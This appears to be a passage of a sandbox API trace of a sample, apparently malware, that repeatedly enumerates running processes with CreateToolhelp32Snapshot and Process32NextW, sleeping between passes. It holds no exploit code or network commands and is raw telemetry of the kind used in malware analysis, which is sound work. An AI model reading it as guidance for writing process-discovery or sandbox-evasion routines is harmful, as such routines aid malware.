1 [0132.831] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0132.832] CloseHandle (hObject=0xc4) returned 1 [0132.832] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0132.837] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0132.838] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0132.839] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0132.839] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0132.840] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0132.841] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0132.841] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0132.842] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0132.843] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0132.843] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.844] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.845] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.845] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.846] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.847] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0132.847] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.848] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.849] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0132.850] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.851] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0132.852] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0132.853] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0132.854] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0132.856] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.857] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0132.858] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0132.859] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0132.860] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0132.862] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0132.863] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0132.864] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0132.865] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0132.867] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0132.868] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0132.869] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0132.870] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0132.871] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0132.872] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0132.873] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0132.927] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0132.928] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0132.929] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0132.931] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0132.932] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0132.933] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0132.934] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.935] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0132.936] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0132.937] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0132.938] CloseHandle (hObject=0xbc) returned 1 [0132.938] Sleep (dwMilliseconds=0x12c) [0133.391] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0133.395] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0133.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0133.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0133.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0133.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0133.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0133.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0133.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0133.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0133.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0133.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0133.409] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0133.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0133.412] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0133.413] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0133.414] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.416] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0133.417] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0133.418] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0133.420] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0133.437] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0133.438] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, 